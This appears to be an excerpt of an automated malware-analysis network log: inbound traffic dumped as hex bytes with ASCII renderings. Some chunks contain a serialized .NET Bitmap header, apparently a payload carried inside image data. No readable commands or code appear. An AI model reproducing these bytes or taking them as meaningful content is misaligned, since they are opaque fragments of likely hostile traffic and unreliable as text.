Ascii: 8\|a~'dB[/G&P0BLHryhCnLyp.H6qp1iMqKy_s_/h4tVw`E/5&2FTn'5c KT_$i~CU-`r.\_07?9ZKT7{};ks11=KoN&{$o"iIJ8\qYm7)uDp
2021-10-16 14:53:38 UTC	2981	IN	Data Raw: c2 1d 73 e4 07 26 a3 4e 90 46 e7 fe 29 cd 16 ab a9 2c 92 4d 4a 6e 00 a9 4b cc 4f e8 5c de 24 0b df 40 48 a5 26 f3 08 b3 2a ef 53 aa 87 68 30 6c 25 df 01 5a 3d 06 c0 f6 ca 77 7d c8 4b 49 e8 f7 34 c0 c0 fb 10 e9 03 25 f7 c2 b2 b2 86 55 8e c7 45 d6 31 df cc f2 a9 86 d4 f9 69 71 d3 4a ff d9 18 ef cc 35 c8 bb fc 7e 2a d1 4c f7 b3 d9 dc 75 e8 d6 c4 93 12 f3 ca e7 01 46 8e 89 40 5f 50 e0 a9 8d 91 d3 7b 62 2f 86 0d 46 dc dc 76 e1 b2 4d ac 8c 70 fa 82 8e a5 fa 2d db f7 ae fe e7 38 eb e3 17 ab 49 ae 0d 73 ca b6 d8 54 56 c2 c1 11 a2 7d d5 4d e1 a7 21 50 3d 4a a9 1f f4 9b fa 63 dc d0 8f 9a 53 03 5f c9 4d 82 06 25 a4 e0 ef 27 df 4e ff 99 ed 66 0f 55 4c 2d 82 4c 1b 8d 97 a8 a2 ff db 60 9a e5 24 12 cf 9d 76 0a 65 63 64 08 ed 79 a6 63 79 db e0 8b f4 83 91 07 ad bf 10 81 Data Ascii: s&NF),MJnKO\$@H&Sh0l%Z=w}KI4%UE1iqJ5~LuF@_P{b/FvMp-8IsTV}M!P=JcS_M%'NfUL-L`$vecdycy
2021-10-16 14:53:38 UTC	2997	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3013	IN	Data Raw: 34 16 98 1f 14 b2 62 54 ed 7d 34 04 a5 3b 64 72 be 0f 56 5f 1b 0c 49 48 d5 11 c7 08 db eb ba d7 2b 58 77 c3 b5 a6 5e 53 f4 cf 11 ee 21 4f 75 c8 98 28 76 9e 56 00 12 e1 09 14 7f 98 68 c6 e4 36 84 fa d6 fe d0 a5 63 46 ac 66 e6 64 62 86 f1 f6 13 8e 98 40 49 39 03 d0 ff 40 48 d3 3b 9e a3 f9 d7 60 a5 97 73 b9 ad d3 f2 d8 3f d0 2c e5 eb 4a 22 25 ef 1e b5 58 66 0d 2a dd d4 d3 ac 9b 85 3c 58 bc 71 01 1c e6 f8 64 44 d3 dc 31 87 53 af 0d 0f 00 00 00 00 23 73 a9 f9 82 18 d1 ab 7c 95 d5 b4 4c 3b cb 8c 56 d9 fe e2 9d 3c 12 59 00 52 35 3c 20 b8 80 d7 f9 18 3e 24 d5 cb 49 3f c9 1b 80 48 9c 6f 9a 8e a3 5f a5 f9 a5 2a 0f a3 f5 7b 71 aa 30 89 8f 45 b5 ea 9f f3 af 91 dc 56 1a 79 74 10 57 3e 34 29 07 d0 fb 10 3b c1 a8 6d 39 b9 ea 75 0f 20 d7 0c f2 d5 da 2d 22 47 a8 32 e9 ba Data Ascii: 4bT}4;drV_IH+Xw^S!Ou(vVh6cFfdb@I9@H;`s?,J"%Xf<XqdD1S#s\|L;V<YR5< >$I?Ho_{q0EVytW>4);m9u -"G2
2021-10-16 14:53:38 UTC	3029	IN	Data Raw: 79 dd 98 2b ab d9 37 2f 45 d5 c5 24 4c 66 fb c9 bc c5 20 a0 94 f8 0f 42 d4 49 c3 aa 90 39 67 af f5 b3 bf ea a8 a0 d9 0a 48 7d 20 4d c8 42 0f 68 e5 20 e3 6d cb de 2e 1e 6e 30 a7 2b 9a b5 30 97 1c f0 e5 c5 82 fe 76 d9 13 c3 3d 91 59 01 94 10 1c 59 5c 45 4f 21 7f 39 73 8a 46 6a 31 bb 31 f7 30 3d 4c 2a b3 e9 70 2a 20 f7 95 7f 23 85 1a a0 fe a8 05 5b 92 e4 e8 d9 9c 0b 9d 2e a2 04 0e 0a 29 1c 17 bd fe 43 fc ce 69 c2 96 1f 79 1f 29 a2 69 d4 af ba 39 05 d9 29 1f b9 07 9c 61 81 7b 43 59 f8 0a eb 97 10 68 cc 0b b3 a8 aa 87 75 d0 8d 0d ec 7c 17 91 43 83 5c 6e 45 38 6a d7 a2 d9 ba bd 46 b3 b6 3c e0 69 30 62 5c f5 00 4c e9 81 5c 04 3a 01 3e 12 34 d8 e4 2f bf 7a aa 0e a0 04 9c a3 3c 55 df b8 9d 7e 62 a3 a8 c1 c9 79 87 64 d6 70 16 f9 41 ca b6 e4 be 41 ab cc cd 44 c5 3c Data Ascii: y+7/E$Lf BI9gH} MBh m.n0+0v=YY\EO!9sFj110=Lp #[.)Ciy)i9)a{CYhu\|C\nE8jF<i0b\L\:>4/z<U~bydpAAD<
2021-10-16 14:53:38 UTC	3045	IN	Data Raw: 43 1e 9f 2e 09 56 24 1e f1 f0 b7 18 ca 9e 77 a4 72 fd bf b2 8c b6 7d 5e d6 c1 c2 56 37 83 e6 27 77 68 41 93 3b c2 6d 18 13 3b 4a bb 09 cf 35 dd c6 d4 99 a5 ee c1 10 55 dc 0b 89 c0 31 e6 dc 0e 10 4b f9 ae c6 b7 68 95 36 42 de de 2d 1b d8 cf 5d 4c cc 36 e5 ca 81 31 06 4c 8e 99 3b a1 bc 07 ce c4 12 0b b1 f2 e4 20 2a 17 d5 f0 c9 06 99 c2 64 03 e4 a9 cf 7b 47 88 7f 25 c4 a1 1d 96 51 1d 63 60 bf 0a d0 e5 f2 62 22 12 99 22 78 4b e4 93 ce b2 30 4c f2 84 f8 2d 1f 4d 39 34 c3 ef e4 11 12 de e8 a1 8a ab 32 99 d2 f6 9a 19 dc a0 21 eb ef 87 33 73 41 4e 79 49 3d 09 92 94 5c 65 7d 71 19 51 64 3c 24 f7 5a 17 bf 9c 6e 19 01 81 2d 12 11 a6 97 7e 65 54 42 da 8e 6f 3b 24 a4 8b 8c 4c a6 fb a7 85 23 06 ed 4e 5c 46 48 d5 47 20 28 a5 75 14 98 85 d4 78 e8 9d 96 f0 8d 42 1a ab 08 Data Ascii: C.V$wr}^V7'whA;m;J5U1Kh6B-]L61L; *d{G%Qc`b""xK0L-M942!3sANyI=\e}qQd<$Zn-~eTBo;$L#N\FHG (uxB
2021-10-16 14:53:38 UTC	3061	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3077	IN	Data Raw: bc a6 09 2b 0e cf 4c 6e 4c 2a 2c 36 3a 99 29 08 6e d5 45 79 e5 7a 03 52 82 e0 db 2f 76 91 b9 fa be 3c 73 b8 06 88 e7 25 48 3b 90 8a 9b 64 68 59 10 68 5e fd c0 0c 9f ac f6 0f 8a 43 31 49 12 b1 bb 86 88 09 46 59 c4 92 9d 71 f7 09 a1 99 ec dd 9d f2 c5 27 44 6d a8 74 97 44 56 4c 54 64 f0 67 44 ab a6 cb 2e a1 c2 38 42 26 98 23 d1 c0 90 26 fb 34 74 18 38 a9 f2 76 ab da 54 b5 4a 22 47 f9 6a 54 2c d9 2e f4 3c 76 fa 20 36 63 3d a4 ba 15 b9 a4 d4 93 27 84 f2 f1 7b ba d7 d9 89 aa 1a 2f ca ce fd bc 9f c0 f9 71 a7 c2 7c d7 54 ed 85 1c 4d d7 7b 51 5e 2a 16 a3 e0 ef 3f cd c9 4f d2 8b 22 77 40 89 f2 b5 45 fa b7 6a 6f 36 ff fa 5e ef 9b e9 75 4e e3 89 17 5a 2f 74 63 80 4f 6f 97 b6 98 20 58 ba 1c 9c 76 7e df 9c 95 85 02 7d ff f8 9b 86 ed 60 54 2c f8 20 76 0a c1 92 82 9a 7d Data Ascii: +LnL,6:)nEyzR/v<s%H;dhYh^C1IFYq'DmtDVLTdgD.8B&#&4t8vTJ"GjT,.<v 6c='{/q\|TM{Q^?O"w@Ejo6^uNZ/tcOo Xv~}`T, v}
2021-10-16 14:53:38 UTC	3093	IN	Data Raw: 54 0d 6f 31 ad 0d 45 f5 13 8d c7 72 9b 97 50 22 ab 1b 45 43 4d c9 3b e1 ae 27 c7 f2 19 26 1a 22 23 8a ed dc 96 63 a7 1a 1b 07 64 63 70 60 dc bf b2 bd e7 81 1f 1c dc d6 4f 07 1b ad 60 14 e7 9f 50 38 a8 5a 6e af 47 ba e2 5f 0d 09 40 f0 fe df fd d8 62 c0 46 1b 59 44 4f 2e 12 8f b3 90 cd e2 86 09 50 0d 0e f2 83 08 b9 47 9c bf b3 bf 56 97 e3 fb 53 bf 6e f6 3f 79 5c 4a 4b cd 5d cf e5 68 06 2f 45 30 99 aa bd 02 19 52 06 cb 1f ef f4 86 1a 7a b8 26 0c 0a 7b d3 7c 71 c0 74 8c f6 f3 73 8a ca 0e 52 25 de 11 43 00 31 bb 3b 30 53 0c 88 65 6d 0f ce ac cd ac 67 53 4f 70 15 0c 34 d1 7e 18 e5 21 f9 ff 59 b7 c3 51 8f 4c 69 bc c7 de a5 b8 35 a2 7b c7 95 43 df e8 83 15 e9 49 b2 1a 97 08 44 19 df 2e 37 26 25 46 fb 7d be 80 f9 fa 50 1d 9b 52 ee 4f 75 fc 27 27 06 18 71 a6 81 a4 Data Ascii: To1ErP"ECM;'&"#cdcp`O`P8ZnG_@bFYDO.PGVSn?y\JK]h/E0Rz&{\|qtsR%C1;0SemgSOp4~!YQLi5{CID.7&%F}PROu''q
2021-10-16 14:53:38 UTC	3109	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3125	IN	Data Raw: 68 c2 dc 50 9a cc ea 97 d9 91 26 3f d3 0c 01 66 8e d3 fe 4a ef f2 5c ca c0 01 23 03 56 e9 ca 61 e2 f5 9e 14 78 6c 42 38 c6 df 0a 6d 75 19 0e e5 52 86 f0 be 70 aa 43 4d a8 6b 54 d1 74 85 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 Data Ascii: hP&?fJ\#VaxlB8muRpCMkTt@QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapDataBM6(,,
2021-10-16 14:53:38 UTC	3141	IN	Data Raw: 87 66 de fc 3b 37 26 0c 0e 7a 08 8e b1 e3 d3 6f b5 8d 1f a6 c7 b5 22 74 15 db d3 16 28 56 1b 08 bd 4a 0b 48 36 28 10 c8 40 f2 5d 30 20 11 0e aa 7f 59 0e 2b df 9c 21 f9 44 92 18 40 ef 0b 69 5b b2 b3 1a 49 e8 ff f1 66 41 08 5d e0 d3 3b a9 1f 7a 50 68 74 45 91 3e e3 08 92 de 73 13 b3 0d c8 e5 81 3a a5 4f ab 95 b5 b4 90 24 42 d5 59 9f 8a 5b c4 90 73 ee db 7d 86 5a 46 33 85 1e c9 d4 6a 82 27 a8 e7 12 52 41 ad 34 c2 55 81 e7 a0 96 2c 93 e2 3f 30 9c b4 c9 64 4f 9e 4b ca 69 72 00 b7 14 c3 2d 69 a4 59 55 56 13 e6 4f 8b 54 c8 89 85 e5 71 3f dd fd 6d ad 35 9c c3 26 f4 76 5e 26 bb 82 29 c9 4e 86 e4 ba 26 32 0c 1a 25 ad 2c e1 54 b5 6f 1c 62 da 46 82 52 ce 13 1b 26 86 dd 5d bd 78 ff 21 46 e2 b3 8e c8 f3 28 d4 d9 c8 df 89 5f 8f 75 bc d5 89 e1 99 cb 98 e6 10 56 f4 a0 8e Data Ascii: f;7&zo"t(VJH6(@]0 Y+!D@i[IfA];zPhtE>s:O$BY[s}ZF3j'RA4U,?0dOKir-iYUVOTq?m5&v^&)N&2%,TobFR&]x!F(_uV
2021-10-16 14:53:38 UTC	3157	IN	Data Raw: ce 62 33 ac db 16 c4 48 26 ca e9 cc 72 28 f9 f4 3f 32 7d e0 ae 38 84 e2 cf 2b 6b 14 42 36 b4 fd 7f 80 dc a7 9a 2e 11 9d 2b c2 9a be d9 0d 16 5c 7b 82 f6 f4 b0 34 64 a9 1d c6 ec 57 bc 4d fb e4 21 1e 09 9e 9b f3 c9 26 39 15 71 87 1f 86 10 2c 30 95 01 df f2 bf 7a 3e 0d bc 8e df be 7b 60 99 b2 73 4c 82 0d 3e 53 2b 71 91 54 ed 6a 6f 62 44 58 bb ab 03 e7 ca ad 9d 6a 41 de cb 53 07 74 31 2d 0f d3 8c 07 05 b3 a2 59 54 3a 0f b7 28 22 bb 93 b9 86 67 bd 25 be 57 c5 e4 b7 b9 7b 3f 8a f3 43 0f 6d 67 50 99 4c 1c b5 cf 01 2f e1 7f 0a 55 6a 92 09 21 52 f1 3f a0 fb 4f 9f 47 4d 8e af 4c 2c 5a 63 8f d0 86 22 f8 cf 34 8f ca 29 15 7f 80 1d f2 15 68 8c eb 7e 5b 7a c8 89 d1 48 a9 93 77 10 70 19 66 5b 05 84 48 fc 16 11 d5 c7 92 da e4 42 5d da 8a 40 25 53 36 68 b4 95 3a d3 85 93 Data Ascii: b3H&r(?2}8+kB6.+\{4dWM!&9q,0z>{`sL>S+qTjobDXjASt1-YT:("g%W{?CmgPL/Uj!R?OGML,Zc"4)h~[zHwpf[HB]@%S6h:
2021-10-16 14:53:38 UTC	3173	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3189	IN	Data Raw: 36 89 ae 5f 1f 59 8f d5 12 9f c0 41 dc 8e 3e 7f f8 75 9c f5 4e 41 36 90 07 a6 01 a5 5b 18 6d 09 7c 1e 77 c4 cc 92 90 fd de 12 c2 27 27 e1 5c c4 82 4b ab 21 12 89 30 e0 d4 64 8b 64 24 42 4d 4e 4a b1 5e df f5 9e 1d 21 cc 54 85 82 94 38 da b0 87 4e db e6 aa c9 ea 78 72 44 f3 5c 0e 82 c5 f3 9d c6 66 90 fa 52 2c 2e 2c fa 3d 4f e2 f3 11 8f 1b bf 5a ff 59 a6 5d a2 d4 b0 fe 6f 7f 06 bc f4 87 33 89 b4 b3 83 c0 50 6c ed 91 e5 57 bc 79 dd 54 8b c7 83 36 3d a9 2a 17 6b c6 d3 76 16 ae 72 8a c2 17 a5 d6 cd 35 0d 9f d9 d2 8b 67 96 a3 15 a5 11 4a 2e 3b d7 5a 31 e8 9f 0c dd 19 e6 d6 e7 4e b5 3b c0 c6 3f f1 ba 5f d3 14 98 49 f1 ce dd d4 0b 9a 2e b9 f8 0d fe 7e f2 59 64 8d 98 a4 55 ed 04 29 b7 12 f5 4a 93 a1 31 4c f8 79 50 6a b1 32 e6 c3 90 e7 bb 65 64 42 b2 10 90 a3 e6 50 Data Ascii: 6_YA>uNA6[m\|w''\K!0dd$BMNJ^!T8NxrD\fR,.,=OZY]o3PlWyT6=*kvr5gJ.;Z1N;?_I.~YdU)J1LyPj2edBP
2021-10-16 14:53:38 UTC	3205	IN	Data Raw: 68 f4 0a 38 9a 0b e8 0a be a7 e3 e4 88 f3 34 73 27 66 a5 f4 07 30 f4 e1 f4 fe 91 9a df 1c 52 da c3 a5 9d 35 9e 6b 67 f6 41 a2 fe d0 7c 72 01 34 9d 44 80 47 55 cb 95 be f6 66 bb 7e b1 31 04 96 ca b3 3a 27 05 83 50 7f 19 a1 7d e0 14 04 92 35 cd 1d 67 65 be 71 68 06 8d 37 63 81 86 3e 4b 6f ca 24 77 63 5d 48 5c 89 9b 4d 55 e2 d0 a0 2e ad 4f df cb 31 83 5b 4b 7c ea f8 dc 34 0f 4b 94 70 84 d4 ec 92 90 7e c7 fc e9 0d 05 69 63 0a e1 e3 3d 76 55 e3 62 14 4a b1 ef 0b ff 43 c4 fb 67 96 ef 97 d7 86 1c 3c 9d b5 9c 7d f5 95 c6 a0 4a ac a5 2e 54 9c d4 b0 df b9 e5 46 e9 9f 0b 8d 2e b3 ed c8 38 fb 7c 6b 47 97 55 09 79 ec 68 2b 12 ca 6e 2b 40 2b cd 99 79 63 63 2d bc 94 7a 08 ee 66 3b 93 4b 97 7a db e9 de 0a f0 7f eb a9 df 62 1f e2 0b ac 64 2f d9 8c 9d 0a 50 17 b7 d3 65 b2 Data Ascii: h84s'f0R5kgA\|r4DGUf~1:'P}5geqh7c>Ko$wc]H\MU.O1[K\|4Kp~ic=vUbJCg<}J.TF.8\|kGUyh+n+@+ycc-zf;Kzbd/Pe
2021-10-16 14:53:38 UTC	3221	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 96 38 bd 16 fc 79 b3 aa 72 90 c4 45 ed 9c 71 aa 60 13 2a 83 bc 88 3d 88 03 04 1f d6 d6 f6 eb Data Ascii: `8yrEq`*=
2021-10-16 14:53:38 UTC	3237	IN	Data Raw: 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: BM6(,,
2021-10-16 14:53:38 UTC	3253	IN	Data Raw: f3 4c 66 47 88 96 3e e4 bb 51 d9 2a d9 c2 0b f0 5d 99 1a 01 3d 5c 0f 50 02 95 e6 8d d7 90 c3 e1 ee 76 d3 8d 15 85 41 db 94 98 f8 df b3 20 8e 65 09 d7 d5 95 94 84 b8 49 18 58 62 f6 a2 b0 ff d4 c1 b3 19 d8 87 03 41 25 63 54 9e e4 e5 4c c5 b5 81 65 3e 29 7e 5d eb 43 f5 82 c3 a2 ea 59 98 c9 93 2f 32 0b 64 61 86 fa f5 28 11 b6 9b 4c bc db a7 16 20 3f 41 13 4f 20 42 5c fd 88 27 31 cd 61 8b 9f da 32 43 f6 cf 72 f5 cd 2d 40 26 eb f5 db 3c 31 c6 7f 53 40 f0 de 03 91 73 d6 f9 53 37 6f 67 7e 26 2b 1d 7d aa a0 c5 e3 30 86 10 aa e5 eb be 1c 3b 87 9d 03 2a d7 db 4d 12 c8 0e 1b fe 31 c4 67 2f b8 07 3d 1d 1a 97 87 a5 d1 d5 71 47 83 3d 7f e4 38 8e 20 63 4a c3 57 bb 06 3f 04 01 5e d9 b2 d0 b6 cf 7a 8d 5b 51 41 20 a3 4a ca e5 73 69 cb c9 13 b7 a7 1e 94 6c bf 11 69 ab 16 d7 Data Ascii: LfG>Q]=\PvA eIXbA%cTLe>)~]CY/2da(L ?AO B\'1a2Cr-@&<1S@sS7og~&+}0;M1g/=qG=8 cJW?^z[QA Jsili
2021-10-16 14:53:38 UTC	3269	IN	Data Raw: d2 82 dd 88 d6 35 f8 88 10 26 a1 ee b7 40 dd 39 ae 8a f2 06 90 7d 4e b3 b6 e1 e7 35 1b 81 23 9b 48 d2 72 4e d7 48 ec b8 7f fa 2d e5 55 0c 15 67 48 4a 3e 6e 62 91 db 71 c5 42 49 f0 1a 99 ec d0 8f 0b e9 5d 1c 2a 57 f7 aa 1b 6d 24 4f 78 5d b6 0c a8 01 7d 97 6d 19 35 e2 4e 67 f3 f4 e0 d7 82 f2 58 34 73 08 6e b0 6c b7 35 07 2a b4 e2 ff 51 e5 ad 0c 6c bc af 1c e4 27 30 73 2b 4b 80 71 f7 5e 6d 37 21 db d9 0a 1e 17 fd b3 9c e5 c8 50 78 41 61 6b ac 9b 63 29 cb 1c 0f 42 06 b8 15 04 f2 10 51 6c a7 c0 81 07 67 e1 99 b4 fe 7b 8e 47 7b 88 91 c2 17 fb 2f 59 76 5b 0c 59 76 13 c1 10 96 23 70 f7 bb 95 55 07 80 f2 7a ec 5b f3 ab 33 98 76 53 eb 6c 90 8d 2e 64 02 67 67 64 00 6d d2 a8 22 ff 31 0e d2 bb d0 13 c1 f3 70 17 87 b0 36 30 01 e8 47 14 a2 b2 db e1 66 f8 7c 58 a8 93 7c Data Ascii: 5&@9}N5#HrNH-UgHJ>nbqBI]Wm$Ox]}m5NgX4snl5Ql'0s+Kq^m7!PxAakc)BQlg{G{/Yv[Yv#pUz[3vSl.dggdm"1p60Gf\|X\|
2021-10-16 14:53:38 UTC	3285	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3301	IN	Data Raw: c7 d5 e6 8a db f0 98 d4 3e 3a 0d 70 58 ce fe 4d 79 c5 93 80 03 1c 10 01 74 07 0e 75 63 4f 56 73 ed fd a5 bc ac 62 9f fc bc a8 44 d7 14 37 66 cb c3 d4 0a 1f e2 26 40 ce e3 13 2f 7a 86 2f 06 d2 13 f3 94 9e 38 6e a6 69 46 da 83 e4 a0 f5 1f 59 50 4e c8 f9 e5 de 0a 50 90 61 62 62 3e 12 51 08 81 1a eb af 8d 18 0e f3 3f e1 d0 f9 dc d3 ca 22 2c ea 85 78 85 7c fc c5 46 df 46 23 cc 17 5d 62 8e 38 55 18 2e 3d 34 36 29 5f b6 8c 58 3a 83 64 d3 1e 8d 71 15 eb 7d 37 b9 f1 aa 00 e0 df 68 4d 27 51 b0 c5 22 5d af 84 da 7f 06 4b 20 cf 21 51 be 0b 7e 83 46 65 32 3a 64 fc 26 5b b3 d3 d8 fd 58 e4 78 f4 f0 63 d7 5f 6b df c1 91 44 4b 14 51 0f c5 1b e4 ea 09 94 ca ab f5 74 4f 97 f3 e5 f1 4b 04 c9 e1 e9 92 e3 15 75 bd 90 97 d2 78 a7 e5 66 27 60 c0 cc cc 4a e1 e3 b0 da 77 79 12 26 Data Ascii: >:pXMytucOVsbD7f&@/z/8niFYPNPabb>Q?",x\|FF#]b8U.=46)_X:dq}7hM'Q"]K !Q~Fe2:d&[Xxc_kDKQtOKuxf'`Jwy&
2021-10-16 14:53:38 UTC	3317	IN	Data Raw: 79 85 7a 75 6f a1 37 fa 24 39 6b 9c 3b 92 53 29 64 27 64 44 25 71 27 01 cc 06 d4 ad 90 3a 48 e4 95 28 1b 58 b1 32 ff c0 62 dc 7a 73 f6 12 ac bb d7 0e db 6f 6e 5f 59 e0 16 d8 3e 98 0c 45 d7 2f b1 1f 5e c8 89 e6 a0 c7 10 ee 1f cb 4b ea c5 44 71 b9 4e 86 06 ac fe 21 94 fe e8 55 dd d2 59 ea e5 e4 31 85 b6 45 4f 3b e9 5e 92 c6 55 f3 b5 d4 c1 79 ff 50 4a cf ce b9 60 b2 c8 e8 87 4e 86 f1 3f 20 64 d9 28 0c 42 3f 0a 0c 33 35 e7 53 e2 6f 50 d9 a4 3b c3 64 fc d0 6b 0b bd ca f7 8e 4e 29 1a 16 b0 dd b4 8e ee 3b 77 b5 7d 78 04 02 6e 0e fe b6 66 16 29 09 83 d3 2a b2 90 cf fe 36 